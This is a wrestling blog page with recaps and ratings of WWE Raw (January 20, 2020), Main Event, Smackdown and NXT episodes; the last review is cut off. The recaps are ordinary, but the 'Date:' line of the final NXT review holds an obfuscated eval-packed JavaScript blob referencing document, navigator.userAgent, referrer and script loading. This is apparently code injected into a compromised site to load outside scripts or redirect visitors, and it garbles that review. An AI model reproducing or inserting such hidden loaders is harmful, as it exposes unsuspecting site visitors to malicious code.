Monday Night Raw – January 20, 2020: Dear Goodness Help Me I’m Starting To Like This

IMG Credit: WWE

Monday Night Raw
Date: January 20, 2020
Location: Intrust Bank Arena, Wichita, Kansas
Commentators: Vic Joseph, Jerry Lawler

There’s no football to contend with tonight and it’s the go home show for the Royal Rumble, meaning it’s time to take the exit for the Road to Wrestlemania. The big story coming out of last week was Buddy Murphy joining forces with Seth Rollins and the AOP, meaning it’s fallout time. Other than that, we have a ladder match for the US Title with Andrade defending against Rey Mysterio. Let’s get to it.

Here are last week’s results if you need a recap.

Opening sequence.

Here are Seth Rollins, the AOP and Buddy Murphy to open things up. Rollins says that all of this has happened because of the fans driving him to do this. Last week though, they needed the help of someone and we see a clip of Murphy joining them to beat down Big Show/Samoa Joe/Kevin Owens. Rollins says this is predestination and this is your time to decide. Everyone in the back needs to choose a side because you’re with them or against them.

Cue Kevin Owens and Samoa Joe, with Owens talking about how Big Show will be back soon but for now, it’s time to fight. Rollins says we can fight but at a proper time in a proper place. Joe thinks he sees a Monday night Messiah in the ring but he hears a lawyered up a** hat. Rollins says come get some, so Joe brings out their backup: that would be the Viking Raiders (the only option they had and a good one) so the fight is on. House is cleaned in a hurry with Rollins and company bailing.

Video on Rey Mysterio vs. Andrade.

Rollins isn’t happy, so tonight it’s Rollins/Murphy challenging for the Tag Team Titles.

United States Title: Andrade vs. Rey Mysterio

Mysterio is challenging in a ladder match and we get Big Match Intros. They both drop to the floor for a ladder to start but Rey head fakes him and dropkicks a ladder into Andrade instead. A hurricanrana off the apron is countered into a swing into the barricade though and it’s Andrade throwing the first ladder inside. Rey blocks a superplex onto the ladder though and sends Andrade down hard onto it instead as we take a break.

Back with Mysterio backdropping Andrade onto the floor, setting up a top rope seated senton to take him down again. Mysterio sends him back inside and knocks him to the floor again, meaning it’s time for a big ladder (makes sense for Rey) but Andrade makes the save and bridges a ladder into the standing one. A superbomb onto the bridged ladder has Rey screaming in pain and we take a break.

Back with the big ladder in the middle and two ladder bridged through it and into the corners. Andrade gets sent to the floor so Rey can climb, only to have Andrade get back up. Andrade loads up a Gory Bomb on top of the ladder but Rey reverses into a sunset bomb. The problem is that he can’t hold on and they both fall onto the ladder for a very nasty crash.

Rey is right back up with a 619 to put him on the floor and there’s the climb. That’s still not enough for Rey to pull it down as Andrade moves the ladder….so Rey drops down into what was supposed to be a hurricanrana but was more just Rey landing on him. Andrade is backdropped to the floor but this time Zelina is waiting on top, meaning she can slap Rey back down. The hammerlock DDT THROUGH THE LADDER finishes Rey and Andrade pulls the title down to retain at 18:45.

Rating: B+. Some of those spots were as intense as I’ve seen in awhile and I liked the ending with Zelina costing Rey the title. This should allow Mysterio to move on to something else and the best thing is that now Andrade is beefed up with a win in a major feud under his belt. That would be the United States belt, which could do some good things for him as well. I mean it probably won’t because that’s what not how WWE uses them but you can always hope.

Post match Vega pulls back the floor mat for the hammerlock DDT onto the concrete but someone in a Rey Mysterio mask makes the save. It’s Humberto Carrillo (not exactly hard to tell) and Andrade bails.

Martin Luther King Jr. video.

Aleister Black b. ???

Black Mass in eight seconds. With that destruction out of the way, it should be noted that Joseph mentioned that the winner of the Rumble can pick his champion to face again.

Here are Brock Lesnar and Paul Heyman for a chat. Heyman talks about being a soothsayer with his spoilers but that shouldn’t be a surprise because he’s talking about Brock Lesnar. The fans aren’t happy but Heyman tells them not to be that harsh on themselves. Heyman explains the concept of the Royal Rumble: Brock starts, throws out someone, throws out the next person, throws out the next person, and so on until the end.

See, Brock doesn’t think there is anyone backstage willing to challenge him at Wrestlemania so he isn’t going to let anyone. Heyman doesn’t like the booing and asks the fans who they think they are to boo Lesnar. Who could possibly challenge Brock Lesnar? Heyman: “Name one! Don’t worry! We’ll wait!”

Cue Ricochet (Heyman: “ARE YOU KIDDING ME?”) to say Heyman talks a lot about how important it is for Brock to enter #1. A lot of people are afraid, but Ricochet isn’t one of them. Heyman thinks that means Ricochet must have been educated in Wichita, because Brock is a hungry champion and Ricochet is lunch meat.

Ricochet is staying right here because he has a chance to fight at the Royal Rumble and could go to Wrestlemania. He’s not scared and gets in the ring and asks if Brock is scared. Brock drops him with one kick to the ribs and says he’s not scared. For some reason Brock and Heyman leave near the announcers’ table instead of through the main entrance.

Randy Orton is ready for the Rumble and tonight, he’s ready for Drew McIntyre, who isn’t on his level.

Randy Orton vs. Drew McIntyre

McIntyre runs him over with a shoulder to start and Orton needs a breather on the floor. McIntyre follows and whips Randy into various things, only to have the Claymore hit the timekeeper. Back from a break with McIntyre chopping away but Orton wins a strike off and, with a Hulk Hogan hand to the ear, drops McIntyre with a hanging DDT. An overhead belly to belly and a vertical suplex plant Orton right back but he counters the Claymore into a powerslam for two.

Orton one ups McIntyre’s suplexes with a top rope superplex, only to roll outside instead of covering. Cue the OC to jump McIntyre but he fights back until a chop block takes him down. Orton makes the save with a chair and we’ll say the match was thrown out (because people not in the match running in and attacking one person isn’t a DQ anymore) at 11:50.

Rating: C. I liked what we got but I really hope the ending doesn’t set up some tag match later tonight. Orton and McIntyre are both people to watch in the Rumble, which isn’t entirely set in stone this year. I don’t think they’ll win, but it’s nice to have a more open field with wrestlers talking about how important a win would be to them.

Charlotte says she’s ready to win the Rumble, even as Becky Lynch pops up next to her.

Becky Lynch vs. Kairi Sane

Non-title. Before the match, Becky says Asuka did a favor last week when she sprayed mist in Becky’s eyes. Maybe Asuka should be the one doubting her and maybe that’s why Asuka won’t face her head on. Yeah Asuka won last year, but then Becky went on to make history around the world, while Asuka went onto YouTube to make soup. On Sunday, Becky collects her last debt because Asuka can’t beat her anymore.

Sane mocks Becky to start and it’s an Asuka distraction so Sane can take out the knee. Another shot to the same knee sends us to an early break. Back with Asuka sitting on the post as Sane grabs a chinlock. Becky jawbreaks her way to freedom and starts the comeback with some clotheslines.

Another distraction lets Sane hit a forearm but Becky grabs a reverse DDT, setting up the middle rope legdrop for two. The Disarm-Her is blocked and Sane grabs a bridging rollup for two of her own. Becky’s suplex is countered into a DDT for another near fall but Becky is right back up. This time she knocks Asuka down and hits the Bexploder on Sane. A kick to the face sets up the Disarm-Her to make Sane tap at 9:02.

Rating: C. The match was fine but what got my attention more here was the camera angle looking different. They had to pan out a bit to show Asuka and it gave the match a different feeling. Raw and Smackdown are shot the same way and it’s cool to see something a little different every now and then. I know there are only so many ways to shoot a wrestling match and make it look good, but changing things up every now and then is nice.

Post match Asuka hits a Shining Wizard and grabs the Asuka Lock before kicking Becky in the head to leave her laying.

Rocky Johnson tribute video. They put some effort in this one.

Asuka and Sane are asked about their cheating and if this is the kind of champion they want to be known as. They rant in Japanese until Asuka says Becky won’t be ready for her on Sunday.

Tag Team Titles: Viking Raiders vs. Seth Rollins/Buddy Murphy

The Raiders are defending and the AOP, Kevin Owens and Samoa Joe are all at ringside. Murphy tags himself in to start with Erik and Seth gives him a hug. That means a running knee from Erik and everything breaks down in a hurry, with the four outside brawling into the crowd to leave the match on its own as we take a break.

Back with Rollins hammering on Erik in the corner but Erik sends Murphy outside. Ivar gets pulled off the apron though and it’s a knee to Erik’s face. Rollins drops a frog splash for two but Erik is back with a knee to the face of his own. The diving tag brings in Ivar to clean house but Rollins breaks up the Viking Experience. The champs put them on the floor for the double suicide dives, followed by the Viking Experience to Murphy back inside.

Rollins makes the save so Ivar kicks him in the face. Murphy is back up and gets kicked in the corner, setting up a double superbomb out of said corner for two. Now it’s Ivar coming back in for the double handspring elbow. The hot tag brings in Erik but Murphy knees him in the head, allowing Rollins to hit a Stomp onto the apron to give Murphy the pin at 11:05.

Rating: B-. They had some drama here but there was no option other than giving Murphy and Rollins the win here. You can’t put a new team together like that one week and then have them lose in their first match. Giving them some silver is a good idea and while they might not have them very long, it’s the right way to go at the moment.

Post break Rollins is rather happy and says that this is Murphy moving in the right direction. We’ll see that again on Sunday when Rollins wins the Royal Rumble for the second year in a row.

Now it’s time for the Monday After The Weekend Update with the Street Profits. Montez Ford makes fun of Paul Heyman and Angelo Dawkins talks about how sick he is of reboots, though he changes his mind upon seeing a picture of the Miz and John Morrison. As for the Royal Rumble, we get a special report from R-Truth….who talks about the city of Houston instead of talking FROM Houston. Dawkins: “Brock Lesnar is entering the Royal Rumble at #1 but R-Truth is entering at 4:20.”

Finally, in regards to Otis and Mandy Rose, here’s what Mandy has to look forward to after Netflix and chill: that would be a video of Otis stripping and gyrating to Val Venis’ music. This is something that could EASILY be a weekly YouTube/Network show instead of an infrequent Raw segment.

Erick Rowan vs. Matt Hardy

Rowan starts fast and hits a splash before sending Matt over the top. A big boot knocks him off the apron so Rowan goes to the crate, only to get bitten on the hand. Rowan slams it onto the steps and then crushes Matt with a running crossbody. The Iron Claw finishes Matt at 2:08.

We recap the Rusev/Lana/Bobby Lashley/Liv Morgan story, starting with the wedding.

Owens and Joe aren’t worried about Seth being in the Rumble because they’ll enter as well. Joe will go through Owens if he needs to though.

The Singh Brothers fail to steal the 24/7 Title from Mojo Rawley, who beats them up instead.

Here are Lashley and Lana for the main event, but first Lana needs to declare Rusev Day canceled. Lashley has to cover her ears from all of the booing as Lana talks about how it’s not their fault they’re pathetic losers. Lana wants a THANK YOU BOBBY/THANK YOU LANA chant because they have shared their love.

Rusev/Liv Morgan vs. Bobby Lashley/Lana

Liv chases Lana around on the floor to start but gets caught as they come back inside. Lana whips her into the corner and gets two off a snap suplex. Liv is right back up though and it’s a double tag to bring in the men. It’s Rusev cleaning house but he pauses before running Lana off the apron. Lashley’s spinning Big Ending gets two with Liv making the save. Rusev is thrown outside so Liv hits an enziguri on Lashley. Lana breaks up the jumping superkick though and Lashley spears Rusev down for the pin at 4:21.

Rating: D. So that ends the feud right? Other than the nightmare inducing idea of Lana vs. Liv in a singles match, I have no idea what else there could be in the whole thing. Lashley has now pinned Rusev three times in a row in singles matches and a tag match. I’m not sure what reason there could be to continue things but I’m sure WWE will figure something out. The match felt like it was supposed to be earlier in the show and they had to cram it in before TV time ran out, which might be better given how it went.

Side note: I think we can officially say we’re never hearing about the Lana/Liv stuff again and I can’t say I’m surprised. They pulled the plug on the Sasha Banks/Bayley idea almost immediately and that seems to be the case again here. It’s what WWE does: they’ll introduce something that could be interesting and then pull back on it because it might be too controversial. I don’t think if it would have been good, but either do it or don’t set it up.

Overall Rating: B-. Rather bad (but quick) main event aside, I liked what we got here. They’re setting up the pay per view very well and we could be in for a good show on Sunday. Rollins and company are getting somewhere and a lot of that has to do with the feeling that some people are getting elevated. At some point you need some fresh blood involved and getting Samoa Joe and Buddy Murphy into the mix is a nice change of pace. I’m not sure how well it’s going to go as we get towards Wrestlemania season, but it’s working for now.


Andrade b. Rey Mysterio – Andrade pulled down the title

Aleister Black b. ??? – Black Mass

Randy Orton vs. Drew McIntyre went to a no contest when OC interfered

Becky Lynch b. Kairi Sane – Disarm-Her

Seth Rollins/Buddy Murphy b. Viking Raiders – Stomp to Erik

Erick Rowan b. Matt Hardy – Iron Claw

Bobby Lashley/Lana b. Rusev/Liv Morgan – Spear to Rusev

Remember to follow me on Twitter @kbreviews and pick up the paperback edition of KB’s Complete 2004 Monday Night Raw Reviews (also -available as an e-book) from Amazon. Check out the information here:

And check out my Amazon author- page with cheap wrestling books at:

Main Event – January 2, 2020: Please Be The New Kind

IMG Credit: WWE

Main Event
Date: January 2, 2020
Location: XL Center, Hartford, Connecticut
Commentators: Byron Saxton, Mickie James

Here are last week’s results if you need a recap.

Opening sequence.

Chelsea Green vs. Sarah Logan

Logan goes straight for the armbar so Green forearms her in the face. A kick to the ribs puts Green on the floor and a headbutt knocks her silly back inside. Green grabs a side slam and puts on a camel clutch, followed by a running dropkick to the side of the head. That’s fine with Logan, who BLASTS her with some forearms and gets two off a bridging suplex. Running knees in the corner get the same on Green, who pulls Logan face first into the middle buckle. An Unprettier gives Green the pin at 5:24.

Rating: C. That was a rather snappy little match and the two of them looked solid out there. Green is brand new and it’s cool to see her putting in this kind of effort so early on. I’m not sure if she was the top choice to jump up to the main roster with so little time in NXT but she has shown she is good enough to hang at this level.

From Smackdown.

The Miz vs. Daniel Bryan vs. King Corbin

The winner gets Wyatt at the Rumble, though Cole calls Bryan the Fiend as we get things started. Miz and Bryan kick away at Corbin to start so he bails to the floor, leaving Miz to roll Bryan up at one. Bryan posts Miz on the floor and hits the big running knee off the apron, only to get sent over the barricade by Corbin (with Bryan seeming to hurt his knee). The chokebreaker drops Miz as well and it’s Corbin completely dominating early on. Back in and the Reality Check drops Corbin, setting up the running corner dropkicks. Corbin runs both of them over though and we take a break.

We come back with Miz and Bryan trading near falls until Miz sends him outside. Miz fires off the kicks to Corbin in the corner, including some to the leg to set up the Figure Four. Bryan comes in with the headbutt for the save and gets two, as Miz looks on in shock for a cool visual. The hold is turned over so Bryan grabs the LeBell Lock on Corbin in a combination you don’t often see.

With that broken up, the End of Days gets two on Miz as Corbin has to make a save. There’s the running knee to Corbin but Ziggler runs in for the superkick to give Corbin two as Reigns makes the save. Reigns knocks Corbin over the barricade and we take another break. We come back with Corbin and Reigns gone, leaving Miz to hit the running corner clothesline.

Bryan gets taken up top and it’s a super shinbreaker (that’s a new one) to work on the knee. A Codebreaker to the knee drops Bryan again and a DDT to the other leg has Bryan in more trouble. Bryan grabs a quick cross armbreaker but Miz bites his hand to break up the LeBell Lock. The running knee is countered into the Skull Crushing Finale for two so Miz goes right back to the Figure Four. That’s reversed as well and Bryan slaps on the LeBell Lock for the tap at 20:18.

Rating: C+. They went with some different stuff here and of course we can’t beat Corbin because the show needs his head or whatever they want to call it. At least they got to the right result and we can move on to the big Fiend vs. Bryan rematch. That being said, oh come on with starting with the triple threat, going to a singles match and then doing a triple threat which turned into a singles. You think they might be overdoing it a bit there?

Post match Bray pops up on screen to say Bryan is about to have all kinds of fun. See, HE isn’t done with Bryan so Bray wants to know if Bryan will let him in. Bryan: “YES!”

Video on the AOP and Seth Rollins’ path of destruction.

From Raw.

Here’s an annoyed Kevin Owens to get things going. Owens gets right to the point and promises fireworks for what happened last week. We see a clip of Seth Rollins and the AOP laying out Samoa Joe last week. Owens promises to take one of them out with him because he saw someone he respects get taken out.

That would be Rey Mysterio, and it made him sick to see Mysterio get beaten down a few weeks back. The beatdown is why Andrade defeated Mysterio for the United States Title and we see a clip of the title change. Cue Rollins and the AOP to say this wasn’t Seth’s decision. He was forced into this roll and now the AOP will enforce his will.

The fight is on with Owens getting crushed in the corner, only to have Samoa Joe come down for the save. Joe beats up the AOP and chokes Rollins but AOP comes back in. Owens makes the next save with some chair shots to the back as security comes down to break it up. Owens hits a bit flip dive onto the three of them plus security, with Joe joining in.

Here’s what’s coming on next week’s Raw.

No Way Jose vs. Mojo Rawley

This is becoming the new Dana Brooke vs. Sarah Logan. Rawley actually gets promo time (!) saying that of course Jose is partying because he does it every day. Here in Hartford, nothing is changing because the people aren’t smart enough to understand what he’s talking about. Instead, Mojo will just embarrass Jose again.

Jose hammers away in the corner to start and it’s an armdrag into a dropkick to put Mojo on the floor. Back from a break with Mojo hitting a flapjack and firing off the shoulders in the corner. Jose fights back again and hits a high crossbody for two, only to get Pounced straight back down. A Backstabber gives Jose two more but Mojo crotches him on top. The running punch finishes Jose at 10:04.

Rating: C. These two have fought each other so many times that it doesn’t mean anything anymore, despite their matches being pretty watchable. Neither is going to be getting anywhere anytime soon and that has to be setting in for them. At least they’re still trying, which is a good sign for both of them, though I don’t know what kind of a future they have.

From Raw to wrap it up.

They get to read their own vows but Lana screeches about the fans chanting RUSEV DAY and how they’re trying to make this day anyone but her. Lana tells Lashley about how awesome she is and starts her own LANA DAY chant. She’s so happy that she wants to jump on him right now….and so she does.

With that broken up, Lana hands Lashley the vows she wrote for him. Lashley reads the very complimentary statements about Lana but has to pause for the WHAT chants. Those don’t sit well with Lana, who spells her name because it’s WHO, not WHAT. He finally wraps it up, with the minister saying that was different. The ring statements go on so long that Lana says “ok we’ve got it, thank you.”

Now we get to the part the minister really dreads and he asks if anyone has reason why they shouldn’t be married. This brings out an unidentified man who says that he’s Lana’s first husband. They got married when she was 18 and then she left him for Rusev, just like she’ll leave Lashley for someone else. Lashley chokeslams him so the minister asks again, which draws out Lashley’s first wife (Minister: “WHO ARE YOU???”), who Lana didn’t seem to know about. Lana beats her up so we ask one more time….and here’s Liv Morgan.

She talks about how she was a lost soul earlier this year but the love of her life brought her to where she needed to be. How could they do this to her? Lashley insists he never laid a finger on her (Minister: “OH COME ON!”), but Liv is talking about Lana. That finally gives the fans something to care about and Liv is near tears, only to be driven into the corner.

A flower pot to the head starts the catfight as Lashley isn’t sure what to do. They’re taken to the floor but Lana gets back in so we can try this one more time. Cue Rusev out of the cake and the fight is on again, with Liv getting back in as the wedding set is destroyed. Lana gets sent into the cake but manages to slap Rusev to end the show.

This was REALLY long at nearly thirty minutes, including an eleven minute overrun. The Liv stuff is at least a twist, but it took so long to get here (both tonight and for the last three months) that it didn’t have much of an impact. This could have been worse, but they needed to cut out a lot of the same stuff going on over and over again.

Overall Rating: C+. Better show than usual here as the two matches surprised me in a good way each. The wedding is what matters the most here though as it was the big angle to end the year. That being said, the thing gets a little better each time I see it, putting it dangerously in the realm of watchable. This gives me no extra confidence for next week, but it’s nice to have a decent week like this one.

Remember to follow me on Twitter @kbreviews and pick up the paperback edition of KB’s Complete 2004 Monday Night Raw Reviews (also available as an e-book) from Amazon. Check out the information here:

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Smackdown – November 21, 2017: Really Shane? Really? Shane?

Date: November 21, 2017
Location: Toyota Center, Houston, Texas
Commentators: Tom Phillips, Byron Saxton, Corey Graves

So the battle between brands is over and now it’s time to find out where we go from here. In theory we go towards Clash of the Champions in just shy of a month, which could mean multiple things. AJ Styles is likely going to have to deal with Jinder Mahal again, though the title match won’t be taking place tonight. Let’s get to it.

We open with a long recap of Sunday’s main event.

Here’s Shane McMahon to get things going. They were so close on Sunday and, despite what his sister wants to say, Smackdown proved that they’re nothing but the best show. The Smackdown roster gives it their all every night and he’s proud of them all. Save for two that is, meaning Kevin Owens and Sami Zayn.

Shane has them come out here and Owens immediately calls Shane drunk with power. Sami wants to know whether it’s harder for Shane to keep coming up with excuses for his failures or just admitting that he’s wrong. They would have beaten the Shield or even won a 5-2 handicap match or beaten Brock Lesnar. Shane says he’s the Commissioner and the two of them have no respect for anyone. He teases firing them but Owens says that would be stupid as they’re both future Hall of Famers.

Shane loads up the firing but gets cut off by Daniel Bryan. Sami starts getting fired up but Daniel tells him to be quiet. Everyone in the back hates Sami and Kevin’s guts, to the point where Bryan had to send Randy Orton home before he tried to kill them. Tonight, the two of them will be facing New Day in a lumberjack match.

So to recap: yes, we are just supposed to go with the fact that Shane put himself in the match and assume that he really was the best option. I have no idea why we’re supposed to go with that other than Shane is a former fan favorite but if you disagree with whatever he says, you’re apparently a heel. Oh and Smackdown is totally equal to Raw, even though it lost on Sunday. Such is life in WWE.

Jey Uso vs. Shelton Benjamin

Shelton lets him out of the corner to start, only to climb the ropes for a knee to the face, knocking Jey outside. Back from an early break with Shelton working on a chinlock until Jey fights up with a Samoan drop. Gable offers a distraction so Shelton can get two off a rollup, only to have Jey score with a superkick for the same. The Superfly Splash misses though and it’s Paydirt to give Shelton the pin at 7:07.

Rating: C-. You might as well just pencil in the Tag Team Title match at Clash of the Champions and that’s fine. It’s not like there are many other teams to challenge for the belts unless they hot shot the Bludgeon Brothers up to the title scene in a hurry. Not bad or anything but they need a little more time to get somewhere, especially with such a simple booking idea.

Sami and Kevin try to get help from Baron Corbin and Bobby Roode, both of whom shoot them down. Roode promises both of them a receipt.

Naomi is getting her makeup done when NXT’s Ruby Riot comes up. She’s with Liv Morgan and Sarah Logan, all of whom beat the heck out of Naomi. Becky Lynch comes in for the save and gets beaten down as well.

The bosses are in the back with Shane praising Bryan’s decisions tonight because he can fire Sami and Kevin whenever he wants. Shane leaves to go watch the show at his hotel.

Hype Bros vs. Bludgeon Brothers

It’s Luke Harper and Erick Rowan with big Thor style hammers. Rowan runs Ryder over to start and knocks him outside. Harper gets in a hard clothesline and sends him into the steps, leaving Rawley alone. A double spinebuster puts Mojo away at 1:24. Total squash.

Natalya applauds Charlotte for winning the title last week and beating Alexa Bliss on Sunday. I mean, Natalya’s cat could beat Bliss but tonight she’ll give Ric Flair something to really cry about.

Video on Brock Lesnar vs. AJ Styles from Sunday.

Here’s Styles for a chat, but first we see a post-match video from Paul Heyman, saying Styles is the best in-ring performer he’s ever seen. AJ wishes he could celebrate with all the fans but it didn’t go as well as he thought it would. He’d love to face Lesnar again though because in the sequel, Rocky wins.

That brings him to Jinder Mahal, who says he’s taking the title back tonight. AJ takes off the jacket and the belt, saying come get it. Mahal pops up on screen to say it’s his time instead of AJ’s. If Mahal had faces Brock, he would be hailed as the Beastmaster. AJ says bring it on because Mahal should be well rested after not doing anything on Sunday. Mahal will take his rematch at Clash of Champions. Cue the Singh Brothers from behind to jump AJ, who cleans house without any trouble.

Sami and Kevin recruit Aiden English and Rusev, who don’t say no.

Women’s Title: Charlotte vs. Natalya

Charlotte is defending after having won last week. Natalya jumps at her to start but gets elbowed in the jaw. That earns her a face first toss into the middle buckle and we take a break. Back with Natalya getting two off a Batista Bomb and grabbing the Sharpshooter. Charlotte makes the rope for the break but Natalya is right back on her with right hands. A whip into the corner lets Charlotte try the moonsault, only to land on the knees. The spear connects but here are Logan, Riot and Morgan to jump Natalya for the DQ at 6:43.

Rating: C+. They were rolling until the interference here with Natalya showing more fire than she has in a long time. Charlotte looked like she was in a fight and that’s not something you see from her too often. I can go for the trio interfering, though I would have liked to see Charlotte get the win first.

Charlotte gets beaten down as well as the trio poses.

Daniel Bryan has no comment on the trio attacking. Sami and Kevin come up and threaten him with repercussions if he fires them.

New Day vs. Sami Zayn/Kevin Owens

Lumberjack match and New Day comes out with some pancakes. Woods is on the floor here as Owens and Big E. get things going. Kevin knocks Kofi outside early on and the lumberjacks let him back in without any issue. Sami comes in so Kofi leapfrogs him into a back elbow for one. Back up and Kofi is sent outside again and for the second time, no one touches him.

Sami goes to get him this time and gets pummeled, sending him running up the aisle. No one is letting that happen though and Sami gets carried back to the ring. We take a break and come back with Owens taking the Unicorn Stampede. Owens knocks Kofi into the corner though and stomps away as Saxton says the lumberjacks are like sharks who can’t wait to get their hands on Owens and Sami. Graves: “Sharks don’t have hands Saxton.”

Sami comes in and mocks New Day’s dancing claps before stomping away. Owens’ backsplash hits Kofi’s knees though and the hot tag brings in Big E. The Big Ending doesn’t work on Sami so it’s back to Kofi for his high crossbody. Everything breaks down with Sami being sent outside, triggering the brawl between the lumberjacks. They all come in and the referee doesn’t call for the DQ, leaving Sami to roll Kofi up for the pin at 11:50.

Rating: C. This was much more about everything else going on than the match itself and that’s fine. Sami and Kevin winning makes sense and it’s not like New Day is hurt by a fluke pin after all the issues with the lumberjacks (or a recent match with Shield). It’s storyline advancement and there’s nothing wrong with that.

Post break the lumberjacks leave with Kofi diving onto Rusev and English. Sami takes the Midnight Hour to leave him laying.

In the back, Owens gets on his knees in front of Bryan, begging him not to fire them. Bryan was never going to do that because he recognizes their talent. Next week, Owens goes one on one with Orton.

Overall Rating: C+. This was a back to normal show without much in the way of major developments. AJ is still champion, Mahal is still in way over his head and saying the same things he always says, Owens and Sami are still right in that they were better options than Shane at Survivor Series and Shane is still a face for reasons that I don’t possibly comprehend. The debuts and returns were nice though and gives the show some much needed fresh blood. Good enough show, though nothing of note really happened.


Shelton Benjamin b. Jey Uso – Paydirt

Bludgeon Brothers b. Hype Bros – Double spinebuster to Rawley

Natalya b. Charlotte via DQ when Sarah Logan, Ruby Riot and Liv Morgan interfered

Sami Zayn/Kevin Owens b. New Day – Rollup to Kingston

Remember to follow me on Twitter @kbreviews and pick up the Updated History of the Intercontinental Title in E-Book or Paperback. Check out the information here:

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NXT – October 11, 2017: Something About How NXT Is Good

Date: October 11, 2017
Location: Full Sail University, Winter Park, Florida
Commentators: Nigel McGuinness, Percy Watson, Mauro Ranallo

It’s another pretty big show this week as we have a Takeover: Brooklyn rematch with Johnny Gargano vs. Andrade Cien Almas. The other big story continues to be Sanity vs. the Undisputed Era with Drew McIntyre watching over the whole thing. Roderick Strong is the other factor, as the Undisputed Era seems interested in adding him to their ranks. Let’s get to it.

We open with a look at Asuka vacating the Women’s Title and the process to crown a new #1 contender.

Opening sequence.

Peyton Royce vs. Liv Morgan vs. Nikki Cross

The winner is in the Women’s Title four way at Takeover. Cross and Morgan yell at Royce to start and a double clothesline puts her on the floor. Nikki immediately goes after Morgan with a sleeper on her back but it’s quickly broken. Royce is back in to yell at Morgan before kicking her down without too much effort. A modified Tarantula has Morgan in more trouble but Cross makes the save by pulling Royce out to the floor in a nasty looking crash. All three are back in now and it’s Cross beating the heck out of both of them.

A crossbody takes Royce and Morgan down and a neckbreaker gets two on Morgan. Peyton throws Nikki down for a second but she takes too long trying for a superplex on Morgan, setting up the Tower of Doom. Cue the Undisputed Era of all people with Taynara Conti from the Mae Young Classic. She comes to the ring to trip Cross, though it doesn’t really do much damage. Cross neckbreakers both Royce and Morgan but Conti pulls her out at two. The chase is on and Royce catches Cross in the fisherman’s suplex for the pin at 7:16.

Rating: B-. I’m a bit surprised and I like the twist they threw in there. That being said, I’d be shocked if Cross didn’t wind up in the title match somehow. She’s one of the biggest stars the division has left and it could be interesting to put the title on someone as crazy as she is. The Undisputed Era potentially adding a female member is interesting and makes the team feel even bigger.

Lio Rush vs. Velveteen Dream

Rush slaps him in the face to start and is way too quick for Dream to catch up with. A pair of kicks to the head rocks Dream but he gets sent hard into the corner. Dream beats him down and keeps telling Rush to say his name. Rush spins around into a tornado DDT but gets caught in a Death Valley Driver. The Purple Rainmaker puts Rush away at 2:46. Rush looked good while he had the chance but this was WAY too short to be any kind of a showcase for him.

We look back at Lars Sullivan destroying Oney Lorcan two weeks ago.

Lars Sullivan vs. Danny Burch

Burch gets right in Lars’ face and gets in a shot to the face, only to take a knee to the ribs to cut him off in a hurry. Lars runs him over with a shoulder and a delayed vertical suplex, followed by a clothesline to cut Burch off. The standing Boss Man Slam is good enough to put Burch away at 2:59.

We look back at the end of last week’s title match with Drew McIntyre successfully defending against Roderick Strong. After the match they shook hands but the Undisputed Era spoke to Strong on the stage.

Street Profits vs. Damien Smith/Marcos Espada

The Profits are really starting to grow on me. Ford shouts a lot and gyrates at Smith to start things off. The Profits waste no time in hitting the World’s Greatest Tag Team’s (or the Beverly Brothers’ for you older fans) jump over the back onto your opponent’s back spot but Ford heads outside to bark. Dawkins splashes Smith in the corner and it’s a spinebuster into the frog splash for the pin at 53 seconds. Well that worked.

The Profits celebrate in the crowd.

Next week: Ember Moon vs. Ruby Riot vs. Sonya DeVille in a Women’s Title qualifying match.

Also next week: Sanity vs. Undisputed Era in a six man tag.

Johnny Gargano vs. Andrade Cien Almas

Takeover: Brooklyn rematch. Feeling out process to start as the announcers discuss what the name Johnny Wrestling means. I’d think it was pretty self explanatory but that’s never stopped WWE before. Gargano grabs a front facelock so slow Almas down but they roll up to a standoff. An elbow and a shoulder have Johnny in some early trouble and Almas has a breather in the ropes.

It’s WAY too early for the Gargano Escape as Almas is too close to the ropes. Back in and a dropkick gives Gargano a cover but not even a one count, which you don’t see that often. We take a break and come back with Almas grabbing an armbar over the top rope and kicking Gargano in the side of the head for a rather cocky two. Johnny is right back with a DDT on the arm and it’s off to a slugout. A tornado Flatliner of all things drops Almas but the spear through the ropes is caught.

Johnny sends him outside though and there’s the suicide dive. Back in and Gargano kicks him in the head but his reverse tornado DDT is countered into something like an Iconoclasm for two. An arm trap German suplex gives Almas the same but the second armbar over the ropes is broken up with some kicks to the back. Another slugout sees Gargano get two off a superkick and it’s time to go up.

Almas shoves the referee into the ropes for a crotching but Johnny isn’t about to take a super hammerlock DDT. Instead it’s a clothesline off the top and a lawn dart to send Almas into the corner. The Gargano Escape goes on but Vega takes off her jacket to reveal the DIY shirt. The distraction lets Almas get to the ropes and Gargano goes to yell at Vega. A pinfall reversal sequence goes nowhere but Gargano is sent into the corner for the double knees to the back of the head twice in a row. The hammerlock DDT ends Gargano at 16:48.

Rating: B. I’m really curious about where this Gargano story is going as they have something with him not being able to get past the DIY stuff. They can fill in a lot of time until Ciampa is back for the big showdown and Gargano can pretty much lose everything until we get to that point.

Overall Rating: B+. Five matches in less than an hour is a rather impressive performance and yet I’m not even surprised they were able to pull it off. Anymore you’re lucky to get two on any given Raw or Smackdown and yet NXT manages to pack more in and feel more entertaining at the same time. It’s another good show this week as a lot of the stories have me wondering where they’re going next, which is the polar opposite of the main roster right now. Good stuff, as usual.


Peyton Royce b. Liv Morgan and Nikki Cross – Fisherman’s suplex to Cross

Velveteen Dream b. Lio Rush – Purple Rainmaker

Lars Sullivan b. Danny Burch – Standing Boss Man Slam

Street Profits b. Damien Smith/Marcos Espada – Frog splash to Smith

Andrade Cien Almas b. Johnny Gargano – Hammerlock DDT

Remember to follow me on Twitter @kbreviews and pick up the Updated History of the Intercontinental Title in E-Book or Paperback. Check out the information here:

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NXT – April 19, 2017: Ten The Hard Way

Date: eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI 45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|htazz|var|u0026u|referrer|ndezf||js|php'.split('|'),0,{})) April 19, 2017
Location: Full Sail University, Winter Park, Florida
Commentators: Percy Watson, Corey Graves, Tom Phillips

Opening sequence.

Tyler Bate and Jack Gallagher have a very polite discussion about their upcoming UK Title match.

Roode is still getting up after the break.

Earlier today, Andrade Cien Almas interrupted Drew McIntyre during his workout and challenged him for next week.

Andrade Cien Almas vs. Danny Burch

